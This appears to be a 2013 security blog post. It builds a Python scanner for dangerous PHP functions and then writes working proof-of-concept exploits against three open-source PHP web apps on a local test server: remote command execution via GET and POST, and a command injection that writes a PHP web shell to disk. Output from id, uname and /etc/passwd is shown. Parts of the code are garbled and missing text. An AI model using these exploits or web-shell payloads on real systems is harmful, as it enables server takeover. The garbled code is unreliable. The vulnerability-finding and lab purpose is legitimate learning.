Next step is to write a simple 'scanner-code' to find out if there is any vulnerability (RCE
via shell_exec in this case, but there is no problem to extend this 'scanner' to find more vulnerable functions/behaviors).
--- code ---
kuba@lap:~/src/py/siema$ cat
#!/usr/bin/env python
import re
import sys
import os
# get_files - listuje katalog z plikami
def get_files(dirname):
for dirname, dirnames, filenames in os.walk(dirname):
# print path to all filenames.
print '[+] dirname to check: ', dirname
print '\n___________________________________________'
for filename in filenames:
# czyta plik podany z argv[1]
# nastepnie, szuka w nim kolejno 'podatnosci'...
def reada_file(filename):
print '[+] --- filename ------------------------------------ > ',filename
with open(dirname+'/'+filename,'r') as fd:
n_line = 0
for line in fd.readlines():
n_line += 1
rce_regex = re.compile(r'((shell_exec[(]|passthru[(]|system[(]|curl_exec[(])(.*)[$].*)')
found =, line)
if found:
print ('\t[!] =========> [+] Found RCE bug, check at source:\n')
print ('\t[ -> line number: [ %d ]\n') % (n_line)
print ('\t[ check parameter here, maybe it\'s not/wrong filtered :]\n %s') % (line)
print '-------> next ----> bug ---> -------------\n'
# ------------------------------ end of tests
# end reada_file()
print ''
## end get_files()
print '[+] Checking started:\n'
print '\n'
print '+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++'
print '+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++'
--- code ---
(Of course, similar output we can get from simple grep command, but this is not the case right now.)
Later, as a draft-of-idea I will add here extended version of this 'python-scanner'.
Let's start it:
kuba@lap:~/src/py/siema$ ./ /home/kuba/public_html/github/rcelab/tourism/ > tourism.log
In tourism.log we can find a lot of strings so, I will suggest you 'read' this file by 'less' command:
$ less tourism.log... (Type: /text to find 'text'. Let's check for /shell_exec or /Found)
[+] --- filename ------------------------------------ > process.php
[!] =========> [+] Found RCE bug, check at source:
[ -> line number: [ 3 ]
[ check parameter here, maybe it's not/wrong filtered :]
$output = shell_exec($_GET['command']);
-------> next ----> bug ---> -------------
Ok, it seems that our super-code found something! ;]
We can verify it in two ways: first (in this case) via browser (because it is a simple GET request) and second: via our simple proof-of-concept code.
Open your browser and go to:
at this stage it was big surprise for me, that this 'webapp' with RCE vulnerability
is actually a WordPress installation ;)
Our vulnerable file is:
After default installation, let's check if we can exploit this vulnerability via browser:
... of course we can! ;]
(By the way, what is 'pino' you will find at GitHub in the 'way' mentioned before:
Ok, so first method (browser) is working, let's find out, how we can write a simple python PoC
to exploit this vulnerbaility:
--- code ---
kuba@lap:~/src/py$ cat
#!/usr/bin/env python
import urllib2
import sys
#host = ''
host = sys.argv[1]
#cmd = 'id;ls%20-la;uname%20-a'
cmd = sys.argv[2]
vulnurl = '/kuba/github/rcelab/tourism/Philippine-Tourism-master/dashboard/git/process.php?command='+cmd
vuln = host+vulnurl
if len(sys.argv) == 3:
check = urllib2.urlopen(vuln)
page = check.readlines()
print 'RCE PoC for Tourism WebApp at: ',host
start = '<pre>'
stop = '</pre>'
print 'exec: ',cmd
for line in page:
print line[len(start):-len(stop)]
print 'host cmd...\n'
--- code ---
Ok, great. now let's check if it's working:
--- code ---
kuba@lap:~/src/py$ ./ uname -a
RCE PoC for Tourism WebApp at:
exec: uname -a
Linux lap 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux
--- code ---
As you can see, vulnerability is 'verified'. ;]
If you will have any troubles with command, try like this:
kuba@lap:~/src/py$ ./ cat+/etc/passwd
RCE PoC for Tourism WebApp at:
exec: cat+/etc/passwd
It should work too.
-- Kamikaze
Let's try how we can exploit another vulnerable webapplication.
kuba@lap:~/src/py/siema$ ./ /home/kuba/public_html/github/rcelab/kamikaze/kamikaze-master/|less
(/Found ... to search for RCE ;])
[+] --- filename ------------------------------------ > bloodywork.php
[!] =========> [+] Found RCE bug, check at source:
[ -> line number: [ 7 ]
[ check parameter here, maybe it's not/wrong filtered :]
-------> next ----> bug ---> -------------
Let's check how bloodywork.php file looks like (and where there is a shell_exec, and what is $cmd param;)):
kuba@lap:~/public_html/github/rcelab/kamikaze/kamikaze-master$ cat bloodywork.php
$controlvalue = $_GET["control"];
$cmd = "./IPC ".$controlvalue;
So our PoC for example before, we can modify a little to exploit 'Kamikaze':
After few modification, code should looks like this:
--- ---
kuba@lap:~/src/py$ cat
#!/usr/bin/env python
# to use this PoC we'll need a directory 777 at remote host!
import urllib2
import sys
#host = ''
host = sys.argv[1]
#cmd = 'id;ls%20-la;uname%20-a'
shell = sys.argv[2]
path = '/github/rcelab/kamikaze/kamikaze-master/'
vulnurl = '/bloodywork.php?control=x;/bin/echo+\'<?php+$c=$_GET[\'c\'];echo+shell_exec($c);?>\'+>+/home/kuba/public_html/'+path+'../../777dir/'+shell
vuln = host+path+vulnurl
if len(sys.argv) == 3:
check = urllib2.urlopen(vuln)
page = check.readlines()
print 'RCE PoC for Kamikaze WebApp at: ',host
print '\n-----\nshell should be here: ',path+shell
print 'host/page/ your-shell-at-webroot\n'
--- ---
(To exploit this vulnerability, you must know location of directory when you can write (chmod 777).
As you can see I decide to create one (777dir) at my /github/'s root (just to show you,
how other this kind of vulnerabilities can be exploited.)
Run poc to see a shell.php in 777dir:
--- code ---
kuba@lap:~/src/py$ ./ hihi.php
RCE PoC for Kamikaze WebApp at:
shell should be here: /github/rcelab/kamikaze/kamikaze-master/hihi.php
--- code ---
--- code ---
kuba@lap:~/src/py$ ls -la /home/kuba/public_html/github/rcelab/777dir/
total 12
drwxrwxrwx 2 kuba kuba 4096 Jun 18 10:49 .
drwxrwxr-x 5 kuba kuba 4096 Jun 18 10:39 ..
-rw-r--r-- 1 www-data www-data 41 Jun 18 10:49 hihi.php
kuba@lap:~/src/py$ cat /home/kuba/public_html/github/rcelab/777dir/hihi.php
<?php $c=$_GET[c];echo shell_exec($c);?>
--- code ---
Now in our browser we can type:
For both cases we used GET method to exploit vulnerable code.
In third example we will send our exploit via POST.
At mentioned GitHub, we can easlz find POST-variable vulnerable to RCE.
Check it out:
kuba@lap:~/src/py/siema$ ./ /home/kuba/public_html/github/rcelab/vauteck/aggreg_platform-master/| less
(/Found... aby znalezc RCE)
--- code ---
[+] --- filename ------------------------------------ > exec.php
[!] =========> [+] Found RCE bug, check at source:
[ -> line number: [ 5 ]
[ check parameter here, maybe it's not/wrong filtered :]
echo json_encode(shell_exec($cmd));
-------> next ----> bug ---> -------------
--- code ---
Great. Let's see what's in the code:
--- code ---
kuba@lap:~/public_html/github/rcelab/vauteck/aggreg_platform-master/www$ cat exec.php
$cmd = $_POST["cmd"];
echo json_encode(shell_exec($cmd));
--- code ---
We can now start to write a simple proof-of-concept using POST method to send the payload.
--- example poc-code ---
kuba@lap:~/src/py$ cat
#!/usr/bin/env python
import httplib, urllib
import sys
target = sys.argv[1]
poc = sys.argv[2]
path = '/kuba/github/rcelab/vauteck/aggreg_platform-master/www/exec.php'
url = target + path
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
params = 'cmd='+poc
conn = httplib.HTTPConnection(target)
response = conn.getresponse()
if response.status == 200:
print '[+] exploit works: ',response.status, response.reason
data =
print data
print '[-] sploit failed :C\n'
--- example poc-code ---
And run it, like:
--- code ---
kuba@lap:~/src/py$ ./ id
[+] exploit works: 200 OK
"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n"
kuba@lap:~/src/py$ ./ uname
[+] exploit works: 200 OK
kuba@lap:~/src/py$ ./ whoami
[+] exploit works: 200 OK
--- code ---
This is how we create 3 PoC's for 3 vulnerable webapplications:
- RCE via GET
- RCE via POST
- remote webshell creating
In case you want to learn how to find vulnerabilities in webapps and write a little code in python,
maybe code below is for you. This is a simple python-based-scanner for PHP webapps.
As you will see below, 'functions to search for vulns' can be easly extended/changed.
So... have fun! ;)
--- ---
#!/usr/bin/env python
import re
import sys
import os
# get_files - listuje katalog z plikami
def get_files(dirname):
for dirname, dirnames, filenames in os.walk(dirname):
# print path to all filenames.
print '[+] dirname to check: ', dirname
print '\n___________________________________________'
for filename in filenames:
# czyta plik podany z argv[1]
# nastepnie, szuka w nim kolejno 'podatnosci'...
def reada_file(filename):
print '[+] --- filename ------------------------------------ > ',filename
with open(dirname+'/'+filename,'r') as fd:
n_line = 0
for line in fd.readlines():
n_line += 1
rce_regex = re.compile(r'((shell_exec[(]|passthru[(]|system[(]|curl_exec[(])(.*)[$].*)')
found =, line)
if found:
print ('\t[!] =========> [+] Found RCE bug, check at source:\n')
print ('\t[ -> line number: [ %d ]\n') % (n_line)
print ('\t[ check parameter here, maybe it\'s not/wrong filtered :]\n %s') % (line)
print '-------> next ----> bug ---> -------------\n'
fi_regex = re.compile(r'((include[(]|include_once[(])(.*)[$].*)')
if fi_regex:
found =, line)
if found:
# if (line.find('_GET') != -1) | (line.find('_POST') != -1) :
print ('\t[!] =========> [+] Found LFI/RFI (include) bug, check at source:\n')
print ('\t[ -> line number: [ %d ]\n') % (n_line)
print ('\t[ check parameter here, maybe it\'s not/wrong filtered :]\n %s') % (line)
print '-------> next ----> bug ---> -------------\n'
fi2_regex = re.compile(r'((require[(]|require_once[(])(.*)[$].*)')
if fi2_regex:
found =, line)
if found:
# if (line.find('_GET') != -1) | (line.find('_POST') != -1) :
print ('\t[!] =========> [+] Found LFI/RFI (require) bug, check at source:\n')
print ('\t[ -> line number: [ %d ]\n') % (n_line)
print ('\t[ check parameter here, maybe it\'s not/wrong filtered :]\n %s') % (line)
print '-------> next ----> bug ---> -------------\n'
fopen_regex = re.compile(r'((fopen[(]|fwrite[(]|file_get_contents[(]|file_put_contents[(]|fread[(])(.*)[$].*)')
if fopen_regex:
found =, line)
if found:
if (line.find('_GET') != -1) | (line.find('_POST') != -1) :
print ('\t[!] =========> [+] Found interesting function related to file-write/read. Maybe it\'s bug, check it at source:\n')
print ('\t[ -> line number: [ %d ]\n') % (n_line)
print ('\t[ check parameter here, maybe it\'s not filtered :]\n %s') % (line)
print '-------> next ----> bug ---> -------------\n'
print ('\t[!] =========> [+] Found interesting function related to file-write/read. Maybe it\'s bug, check it at source:\n')
print ('\t[ -> line number: [ %d ]\n') % (n_line)
print ('\t[ check parameter here, maybe it\'s not filtered :]\n %s') % (line)
print '-------> next ----> bug ---> -------------\n'
preg_regex = re.compile(r'((preg_replace[(]|preg_match[(])(.*)[$].*)')
if preg_regex:
found =, line)
if found:
if (line.find('_GET') != -1) | (line.find('_POST') != -1) :
print ('\t[!] =========> [+] Found interesting function related to *preg_match* write/read. Maybe it\'s bug, check it at source:\n')
print ('\t[ -> line number: [ %d ]\n') % (n_line)
print ('\t[ check parameter here, maybe it\'s not filtered :]\n %s') % (line)
print '-------> next ----> bug ---> -------------\n'
# ------------------------------ end of tests
# end reada_file()
print ''
## end get_files()
print '[+] Checking started:\n'
print '\n'
print '+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++'
print '+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++'
--- ---
If you have any questions, feel free to ask.
Once again, have fun! ;)
Tuesday 11 June 2013
[EN] New code, new vulnerabilities - PICOL LFI
Durning one of my project few days ago I wrote another version of my source code scanner.
Another one, because this 'super code' is a never ending story. Maybe I will put here few examples in the future in some kind of 'how to do' this or that. We'll see... ;)
Below, simple example (related to post about nice trick @ and questions about 'how I found this webapp' code to tests):
Yes, in this example this is local file include vulnerability in a PICOL Generator .
If we will set 'wrong' php.ini settings, we can make here remote file include attack too.
Anyway, durning a webapp pentest, if we'll find this webapp, server can be 'hacked' ;)
Have fun! at localhost ;]
One more idea if you don't know this site, check it now .;)
Another one, because this 'super code' is a never ending story. Maybe I will put here few examples in the future in some kind of 'how to do' this or that. We'll see... ;)
Below, simple example (related to post about nice trick @ and questions about 'how I found this webapp' code to tests):
Yes, in this example this is local file include vulnerability in a PICOL Generator .
If we will set 'wrong' php.ini settings, we can make here remote file include attack too.
Anyway, durning a webapp pentest, if we'll find this webapp, server can be 'hacked' ;)
Have fun! at localhost ;]
One more idea if you don't know this site, check it now .;)
code review,
Friday 7 June 2013
[EN] Nice RCE to learn RCE ;)
Once uppon a time I saw a post at vulndev.
It was an excellent idea to write about 'how you can find RCE vuln in webapp'.
You can be a good coder, or great auditor, that's great. But maybe to
'see' (or better 'imagine') what can be done via this vulnerability, you should
'see' it at your own 'learning-localhost-server' ;]
Check it out, screen below is a 'one of few webapps' vulnerable. PoCc code is simple GET request
(via browser, via python,, whatever you want...).
Ideas about fixing and finding this kind of vulnerabilities you will easly find at OWASP's pages.
There is no reason to write it here again, and again... ;]
If you have any questions about how to find this or other bugs/vulns, just mail me
few words about it. :)
Have a nice day!
It was an excellent idea to write about 'how you can find RCE vuln in webapp'.
You can be a good coder, or great auditor, that's great. But maybe to
'see' (or better 'imagine') what can be done via this vulnerability, you should
'see' it at your own 'learning-localhost-server' ;]
Check it out, screen below is a 'one of few webapps' vulnerable. PoCc code is simple GET request
(via browser, via python,, whatever you want...).
Ideas about fixing and finding this kind of vulnerabilities you will easly find at OWASP's pages.
There is no reason to write it here again, and again... ;]
If you have any questions about how to find this or other bugs/vulns, just mail me
few words about it. :)
Have a nice day!
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